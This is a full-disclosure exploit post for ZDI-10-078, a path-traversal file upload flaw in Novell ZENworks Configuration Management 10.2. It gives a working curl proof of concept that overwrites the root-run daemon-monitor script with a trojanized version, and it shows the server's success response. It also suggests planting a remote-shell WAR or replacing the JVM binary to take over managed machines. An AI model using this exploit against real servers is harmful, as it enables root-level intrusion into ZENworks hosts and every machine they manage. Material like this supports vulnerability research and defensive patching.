# Exploit Title: ZDI-10-078: NovellZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability # Date: 2009-04-26 # Author: tucanalamigo http://tucanalamigo.blogspot.com # Software Link: http://www.novell.com/products/zenworks/configurationmanagement/ # Version: 10.2 # Tested on: GNU/Linux (SLES11) * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com) http://www.zerodayinitiative.com/advisories/ZDI-10-078/ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * You can overwrite any file owned by zenworks user (nearly all /opt/novell) such as /opt/novell/zenworks/bin/daemon-monitor that is a shell script executed by NovellZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and "of course" running as root... $ ls -l /opt/novell/zenworks/bin/daemon-monitor -rw-rw-r-- 1 zenworkszenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor $ cat /opt/novell/zenworks/bin/daemon-monitor SERVICES=`awk -F= '{ if ($1 == # "services") print $2}' /etc/opt/novell/zenworks/monitor.conf` SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf` echo $SERVICES echo $SLEEPTIME if [ -z "$SERVICES" ]; then echo "No services defined in /etc/opt/novell/zenworks/monitor.conf" exit 1 fi if [ -z "$SLEEPTIME" ]; then SLEEPTIME=10 fi while [ 1 ]; do sleep $SLEEPTIME for SRV in $SERVICES; do /etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start ( date ; id ) >> /tmp/monitor.log 2>&1 done done $ You can change /opt/novell/zenworks/bin/jsvc (Java Virtual Machine), upload a new remoteshell.war on /opt/novell/zenworks/share/tomcat/webapps or use imagination to take control of all machines configured in ZCM. PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado): $ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream" * About to connect() to zcm.server port 80 (#0) * Trying 127.11.22.33... connected * Connected to zcm.server (127.11.22.33) port 80 (#0) > POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1 > User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.2 > Host: zcm.server > Accept: */* > Content-Type: application/octet-stream > Content-Length: 554 > < HTTP/1.1 200 OK HTTP/1.1 200 OK < Server: Apache-Coyote/1.1 Server: Apache-Coyote/1.1 < Content-Length: 0 Content-Length: 0 < Date: Mon, 26 Apr 2010 21:58:05 GMT Date: Mon, 26 Apr 2010 21:58:05 GMT < * Connection #0 to host zcm.server left intact * Closing connection #0 $ -- Saludosde #linux, tu canal amigo. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/